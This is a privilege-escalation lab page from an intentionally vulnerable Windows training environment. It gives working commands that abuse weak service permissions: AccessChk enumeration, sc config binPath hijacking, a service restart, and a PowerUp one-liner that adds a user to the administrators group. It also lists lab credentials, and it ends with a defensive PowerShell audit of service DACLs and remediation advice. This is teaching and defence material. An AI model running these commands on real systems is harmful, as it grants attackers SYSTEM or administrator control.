🪟 Windows Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
⚠️ Pracivo Security Lab: Windows privilege escalation techniques. Start as a low-privilege user, then escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo  |  alice / alice123  |  administrator / Admin@2024 (goal: escalate to this)

Weak Service Permissions

PRIVILEGE ESCALATION
# If a low-privileged user can change the binary path of a service that runs as SYSTEM,
# they can point the service at their own payload, which then runs as SYSTEM.

# Step 1: Check service permissions with AccessChk
accesschk.exe -ucqv * /accepteula | findstr "RW"
accesschk.exe -ucqv VulnService /accepteula

# If output shows: RW BUILTIN\Users — you can modify it

# Step 2: Change the service binary path to your payload
sc config VulnService binPath= "C:\temp\shell.exe"
# Make sure the service is configured to run as LocalSystem
sc config VulnService obj= ".\LocalSystem" password= ""

# Step 3: Restart the service
net stop VulnService
net start VulnService
# Payload runs as SYSTEM

# PowerUp alternative (run in PowerShell with PowerUp.ps1 loaded):
Get-ModifiableService | Invoke-ServiceAbuse -Command "net localgroup administrators ram /add"

# After adding yourself to administrators:
net localgroup administrators
# Confirms you are now admin
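
From the defender's side, the condition AccessChk reports in Step 1 can be audited by parsing each service's security descriptor for change-config or DACL-rewrite rights granted to ordinary users. The PowerShell below is an added example, not part of the original lab; the function name Test-ServiceSddl, the HardenedSvc name and both sample SDDL strings are constructed for illustration.

```powershell
# Added example: defensive audit of service DACLs (not part of the original lab).
# Rights that allow reconfiguring a service or rewriting its DACL/owner.
$DangerousRights = [ordered]@{
    SERVICE_CHANGE_CONFIG = 0x00000002
    WRITE_DAC             = 0x00040000
    WRITE_OWNER           = 0x00080000
    GENERIC_ALL           = 0x10000000
    GENERIC_WRITE         = 0x40000000
}
# Well-known SIDs that include ordinary, non-admin users.
$LowPrivSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}

function Test-ServiceSddl {
    param([string]$Name, [string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier.Value
        # Only allow-ACEs for low-privilege principals are of interest.
        if ($ace.AceQualifier -ne 'AccessAllowed' -or -not $LowPrivSids.ContainsKey($sid)) { continue }
        $hits = $DangerousRights.Keys | Where-Object { $ace.AccessMask -band $DangerousRights[$_] }
        if ($hits) {
            [pscustomobject]@{ Service = $Name; Principal = $LowPrivSids[$sid]; Rights = $hits -join ',' }
        }
    }
}

# Constructed sample descriptors (not taken from a real host).
# HardenedSvc: INTERACTIVE has query/read rights only, so nothing is reported.
Test-ServiceSddl 'HardenedSvc' 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)'
# VulnService: BUILTIN\Users holds DC (SERVICE_CHANGE_CONFIG), so it is reported.
Test-ServiceSddl 'VulnService' 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPLOCRRC;;;BU)'

# Live audit: read each service's descriptor with sc.exe sdshow.
foreach ($svc in Get-Service) {
    $sddl = & sc.exe sdshow $svc.Name | Where-Object { $_ -like 'D:*' } | Select-Object -First 1
    if ($sddl) { Test-ServiceSddl $svc.Name $sddl }
}
```

A reported service is remediated by resetting its DACL with sc.exe sdset so that only SYSTEM and Administrators hold change-config, WRITE_DAC and WRITE_OWNER rights.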